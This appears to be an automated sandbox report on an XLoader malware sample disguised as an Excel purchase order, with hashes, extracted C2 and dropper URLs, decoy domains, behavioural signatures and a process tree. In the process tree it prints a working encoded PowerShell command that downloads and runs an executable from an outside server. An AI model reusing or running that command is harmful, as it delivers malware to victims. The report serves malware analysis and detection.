xloader | 1bb358787d60e233085600f2c9140c228314fa4ba9d9a49f85c2605359d47cc2

General

Target

Purchase order 45037966707/Purchase order 45037966707.xlsm
Size

22KB
MD5

9fc5194e1a01302c4495dfeb12f47085
SHA1

d61c8d632c0b6a1395d4c8e7702bb93f11e5c318
SHA256

37ea86d0e937ae285a463cf50c529ca69d6621f49c34e03b407fc2726b292d0c
SHA512

1e06c982cc4907a0d343324fd022d549545c74879bc57b2b2350c84ce42da3917a5dde889ff3b1511b52cf58eb1c9aad5d41bf49b8dad2aa407510ecc0b8c505

Score

10^/10

xloader pufi loader rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://20.102.53.71/mvn/systemdc.exe

Extracted

Family

xloader

Version

2.5

Campaign

pufi

C2

http://www.homestechs.com/pufi/

Decoy

fusiongroupgames.net

hugevari.com

rebeccagriffiths.com

trocaoferta.com

theslashapp.com

codezonesoftware.xyz

sottocommunications.com

minicreators.online

course2millions.com

hfm5n1dhkjqwpe.xyz

xlab-ub.com

silvanaribeirocake.com

thefabinteriordesign.com

mg-leadership.com

petbort.com

ndust.net

203040302.xyz

jakital.com

shophuunghia.info

rednacionaldejuecesrd.net

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2760	2540	cmd.exe	EXCEL.EXE

Xloader
Xloader is a rebranded version of Formbook malware.
loader xloader

Xloader Payload 3 IoCs

rat

Processes:

resource	yara_rule
behavioral4/memory/2008-336-0x000000000041D450-mapping.dmp	xloader
behavioral4/memory/2008-339-0x0000000000400000-0x0000000000429000-memory.dmp	xloader
behavioral4/memory/1956-345-0x0000000000FB0000-0x0000000000FD9000-memory.dmp	xloader

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

33 944 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

Ekzjgllskgnjmxcgqvor.exeEkzjgllskgnjmxcgqvor.exe

pid process

3144 Ekzjgllskgnjmxcgqvor.exe
2008 Ekzjgllskgnjmxcgqvor.exe
Deletes itself 1 IoCs

Processes:

EXCEL.EXE

pid process

2540 EXCEL.EXE

flow	pid	process
33	944	powershell.exe

pid	process
3144	Ekzjgllskgnjmxcgqvor.exe
2008	Ekzjgllskgnjmxcgqvor.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

Ekzjgllskgnjmxcgqvor.exeEkzjgllskgnjmxcgqvor.exenetsh.exe

description	pid	process	target process
PID 3144 set thread context of 2008	3144	Ekzjgllskgnjmxcgqvor.exe	Ekzjgllskgnjmxcgqvor.exe
PID 2008 set thread context of 3008	2008	Ekzjgllskgnjmxcgqvor.exe	Explorer.EXE
PID 1956 set thread context of 3008	1956	netsh.exe	Explorer.EXE

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE

NTFS ADS 1 IoCs

Processes:

EXCEL.EXE

description ioc process

File created C:\Users\Admin\AppData\Local\Temp\Purchase order 45037966707\48267F00\:Zone.Identifier:$DATA EXCEL.EXE
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

2540 EXCEL.EXE

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Temp\Purchase order 45037966707\48267F00\:Zone.Identifier:$DATA	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exeEkzjgllskgnjmxcgqvor.exenetsh.exe

pid	process
944	powershell.exe
944	powershell.exe
944	powershell.exe
2008	Ekzjgllskgnjmxcgqvor.exe
2008	Ekzjgllskgnjmxcgqvor.exe
2008	Ekzjgllskgnjmxcgqvor.exe
2008	Ekzjgllskgnjmxcgqvor.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe
1956	netsh.exe

Suspicious behavior: MapViewOfSection 5 IoCs

Processes:

Ekzjgllskgnjmxcgqvor.exenetsh.exe

pid process

2008 Ekzjgllskgnjmxcgqvor.exe
2008 Ekzjgllskgnjmxcgqvor.exe
2008 Ekzjgllskgnjmxcgqvor.exe
1956 netsh.exe
1956 netsh.exe
Suspicious behavior: RenamesItself 1 IoCs

Processes:

EXCEL.EXE

pid process

2540 EXCEL.EXE

pid	process
2008	Ekzjgllskgnjmxcgqvor.exe
2008	Ekzjgllskgnjmxcgqvor.exe
2008	Ekzjgllskgnjmxcgqvor.exe
1956	netsh.exe
1956	netsh.exe

Suspicious use of AdjustPrivilegeToken 21 IoCs

Processes:

powershell.exeEkzjgllskgnjmxcgqvor.exenetsh.exeExplorer.EXE

description	pid	process
Token: SeDebugPrivilege	944	powershell.exe
Token: SeDebugPrivilege	2008	Ekzjgllskgnjmxcgqvor.exe
Token: SeDebugPrivilege	1956	netsh.exe
Token: SeShutdownPrivilege	3008	Explorer.EXE
Token: SeCreatePagefilePrivilege	3008	Explorer.EXE
Token: SeShutdownPrivilege	3008	Explorer.EXE
Token: SeCreatePagefilePrivilege	3008	Explorer.EXE
Token: SeShutdownPrivilege	3008	Explorer.EXE
Token: SeCreatePagefilePrivilege	3008	Explorer.EXE
Token: SeShutdownPrivilege	3008	Explorer.EXE
Token: SeCreatePagefilePrivilege	3008	Explorer.EXE
Token: SeShutdownPrivilege	3008	Explorer.EXE
Token: SeCreatePagefilePrivilege	3008	Explorer.EXE
Token: SeShutdownPrivilege	3008	Explorer.EXE
Token: SeCreatePagefilePrivilege	3008	Explorer.EXE
Token: SeShutdownPrivilege	3008	Explorer.EXE
Token: SeCreatePagefilePrivilege	3008	Explorer.EXE
Token: SeShutdownPrivilege	3008	Explorer.EXE
Token: SeCreatePagefilePrivilege	3008	Explorer.EXE
Token: SeShutdownPrivilege	3008	Explorer.EXE
Token: SeCreatePagefilePrivilege	3008	Explorer.EXE

Suspicious use of SetWindowsHookEx 17 IoCs

Processes:

EXCEL.EXEExplorer.EXE

pid	process
2540	EXCEL.EXE
2540	EXCEL.EXE
2540	EXCEL.EXE
2540	EXCEL.EXE
2540	EXCEL.EXE
2540	EXCEL.EXE
2540	EXCEL.EXE
2540	EXCEL.EXE
2540	EXCEL.EXE
2540	EXCEL.EXE
2540	EXCEL.EXE
2540	EXCEL.EXE
2540	EXCEL.EXE
2540	EXCEL.EXE
2540	EXCEL.EXE
2540	EXCEL.EXE
3008	Explorer.EXE

Suspicious use of WriteProcessMemory 19 IoCs

Processes:

EXCEL.EXEcmd.exepowershell.exeEkzjgllskgnjmxcgqvor.exeExplorer.EXEnetsh.exe

description	pid	process	target process
PID 2540 wrote to memory of 2760	2540	EXCEL.EXE	cmd.exe
PID 2540 wrote to memory of 2760	2540	EXCEL.EXE	cmd.exe
PID 2760 wrote to memory of 944	2760	cmd.exe	powershell.exe
PID 2760 wrote to memory of 944	2760	cmd.exe	powershell.exe
PID 944 wrote to memory of 3144	944	powershell.exe	Ekzjgllskgnjmxcgqvor.exe
PID 944 wrote to memory of 3144	944	powershell.exe	Ekzjgllskgnjmxcgqvor.exe
PID 944 wrote to memory of 3144	944	powershell.exe	Ekzjgllskgnjmxcgqvor.exe
PID 3144 wrote to memory of 2008	3144	Ekzjgllskgnjmxcgqvor.exe	Ekzjgllskgnjmxcgqvor.exe
PID 3144 wrote to memory of 2008	3144	Ekzjgllskgnjmxcgqvor.exe	Ekzjgllskgnjmxcgqvor.exe
PID 3144 wrote to memory of 2008	3144	Ekzjgllskgnjmxcgqvor.exe	Ekzjgllskgnjmxcgqvor.exe
PID 3144 wrote to memory of 2008	3144	Ekzjgllskgnjmxcgqvor.exe	Ekzjgllskgnjmxcgqvor.exe
PID 3144 wrote to memory of 2008	3144	Ekzjgllskgnjmxcgqvor.exe	Ekzjgllskgnjmxcgqvor.exe
PID 3144 wrote to memory of 2008	3144	Ekzjgllskgnjmxcgqvor.exe	Ekzjgllskgnjmxcgqvor.exe
PID 3008 wrote to memory of 1956	3008	Explorer.EXE	netsh.exe
PID 3008 wrote to memory of 1956	3008	Explorer.EXE	netsh.exe
PID 3008 wrote to memory of 1956	3008	Explorer.EXE	netsh.exe
PID 1956 wrote to memory of 3736	1956	netsh.exe	cmd.exe
PID 1956 wrote to memory of 3736	1956	netsh.exe	cmd.exe
PID 1956 wrote to memory of 3736	1956	netsh.exe	cmd.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3008

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Purchase order 45037966707\Purchase order 45037966707.xlsm"
2⤵
- Deletes itself
- Checks processor information in registry
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: RenamesItself
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2540

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\Bqzazthpkhjgkygrz.bat
3⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2760

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -win 1 -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBFAGsAegBqAGcAbABsAHMAawBnAG4AagBtAHgAYwBnAHEAdgBvAHIALgBlAHgAZQAiADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcAA6AC8ALwAyADAALgAxADAAMgAuADUAMwAuADcAMQAvAG0AdgBuAC8AcwB5AHMAdABlAG0AZABjAC4AZQB4AGUAIgAsACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAKAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAJABQAHIAbwBjAE4AYQBtAGUAIgApAA==
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:944

C:\Users\Admin\AppData\Roaming\Ekzjgllskgnjmxcgqvor.exe
"C:\Users\Admin\AppData\Roaming\Ekzjgllskgnjmxcgqvor.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3144

C:\Users\Admin\AppData\Roaming\Ekzjgllskgnjmxcgqvor.exe
"C:\Users\Admin\AppData\Roaming\Ekzjgllskgnjmxcgqvor.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:2008

C:\Windows\SysWOW64\netsh.exe
"C:\Windows\SysWOW64\netsh.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1956

C:\Windows\SysWOW64\cmd.exe
/c del "C:\Users\Admin\AppData\Roaming\Ekzjgllskgnjmxcgqvor.exe"
3⤵
PID:3736

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Ekzjgllskgnjmxcgqvor.exe
MD5
91679f42cd3ba051b5c7ce37d45b222c

SHA1
decc607894a299033ed3ede115a3bce51d21020b

SHA256
e059ab9141d67e0b2e9eb83d34ba88e480f7091bcd97b78466386a17b44a235e

SHA512
b3dd48fc2267a50e9468e0e0be746e224618fd4aaab07e69c3f32c473831145a9fdd6a4cf87266f284bed9c9d1bf227f21f244d15242582f096dc4bf9c64855a

Download Submit
C:\Users\Admin\AppData\Roaming\Ekzjgllskgnjmxcgqvor.exe
MD5
91679f42cd3ba051b5c7ce37d45b222c

SHA1
decc607894a299033ed3ede115a3bce51d21020b

SHA256
e059ab9141d67e0b2e9eb83d34ba88e480f7091bcd97b78466386a17b44a235e

SHA512
b3dd48fc2267a50e9468e0e0be746e224618fd4aaab07e69c3f32c473831145a9fdd6a4cf87266f284bed9c9d1bf227f21f244d15242582f096dc4bf9c64855a

Download Submit
C:\Users\Admin\AppData\Roaming\Ekzjgllskgnjmxcgqvor.exe
MD5
91679f42cd3ba051b5c7ce37d45b222c

SHA1
decc607894a299033ed3ede115a3bce51d21020b

SHA256
e059ab9141d67e0b2e9eb83d34ba88e480f7091bcd97b78466386a17b44a235e

SHA512
b3dd48fc2267a50e9468e0e0be746e224618fd4aaab07e69c3f32c473831145a9fdd6a4cf87266f284bed9c9d1bf227f21f244d15242582f096dc4bf9c64855a

Download Submit
C:\Users\Admin\Documents\Bqzazthpkhjgkygrz.bat
MD5
996c0a65e6b3332e0ae7233f45828afb

SHA1
3b4d9f7bb3d2ba83badd39e69fac2852808d6407

SHA256
05a5000a91b73c130b33fed9b9746a20522dab0e9c769064831a567e00fec694

SHA512
0888baee5736ccdaec9e974cbbbdae6c4a0fa7a6cab99b0973101c5d756b8b0880e6f6869fc17491c9c82af96443e3fecb31e3ae0e3c04968f5ce826ba7c33eb

Download Submit
memory/944-304-0x00000230F7D93000-0x00000230F7D95000-memory.dmp

Filesize
8KB

Download
memory/944-303-0x00000230F7D90000-0x00000230F7D92000-memory.dmp

Filesize
8KB

Download
memory/944-309-0x00000230F7D96000-0x00000230F7D98000-memory.dmp

Filesize
8KB

Download
memory/944-290-0x0000000000000000-mapping.dmp

Download
memory/1956-344-0x0000000001570000-0x000000000158E000-memory.dmp

Filesize
120KB

Download
memory/1956-343-0x0000000000000000-mapping.dmp

Download
memory/1956-347-0x0000000003B00000-0x0000000003E20000-memory.dmp

Filesize
3.1MB

Download
memory/1956-348-0x0000000003A30000-0x0000000003AC0000-memory.dmp

Filesize
576KB

Download
memory/1956-345-0x0000000000FB0000-0x0000000000FD9000-memory.dmp

Filesize
164KB

Download
memory/2008-336-0x000000000041D450-mapping.dmp

Download
memory/2008-340-0x0000000001470000-0x0000000001790000-memory.dmp

Filesize
3.1MB

Download
memory/2008-341-0x0000000000FF0000-0x0000000001001000-memory.dmp

Filesize
68KB

Download
memory/2008-339-0x0000000000400000-0x0000000000429000-memory.dmp

Filesize
164KB

Download
memory/2540-118-0x00007FF8AF160000-0x00007FF8AF170000-memory.dmp

Filesize
64KB

Download
memory/2540-117-0x00007FF8AF160000-0x00007FF8AF170000-memory.dmp

Filesize
64KB

Download
memory/2540-128-0x00007FF8AC570000-0x00007FF8AC580000-memory.dmp

Filesize
64KB

Download
memory/2540-121-0x000001D2480A0000-0x000001D2480A2000-memory.dmp

Filesize
8KB

Download
memory/2540-116-0x00007FF8AF160000-0x00007FF8AF170000-memory.dmp

Filesize
64KB

Download
memory/2540-119-0x00007FF8AF160000-0x00007FF8AF170000-memory.dmp

Filesize
64KB

Download
memory/2540-129-0x00007FF8AC570000-0x00007FF8AC580000-memory.dmp

Filesize
64KB

Download
memory/2540-115-0x00007FF8AF160000-0x00007FF8AF170000-memory.dmp

Filesize
64KB

Download
memory/2540-122-0x000001D2480A0000-0x000001D2480A2000-memory.dmp

Filesize
8KB

Download
memory/2540-120-0x000001D2480A0000-0x000001D2480A2000-memory.dmp

Filesize
8KB

Download
memory/2760-288-0x0000000000000000-mapping.dmp

Download
memory/3008-342-0x0000000005C20000-0x0000000005D8B000-memory.dmp

Filesize
1.4MB

Download
memory/3008-349-0x00000000032B0000-0x0000000003393000-memory.dmp

Filesize
908KB

Download
memory/3144-326-0x0000000005930000-0x0000000005E2E000-memory.dmp

Filesize
5.0MB

Download
memory/3144-318-0x0000000000000000-mapping.dmp

Download
memory/3736-346-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads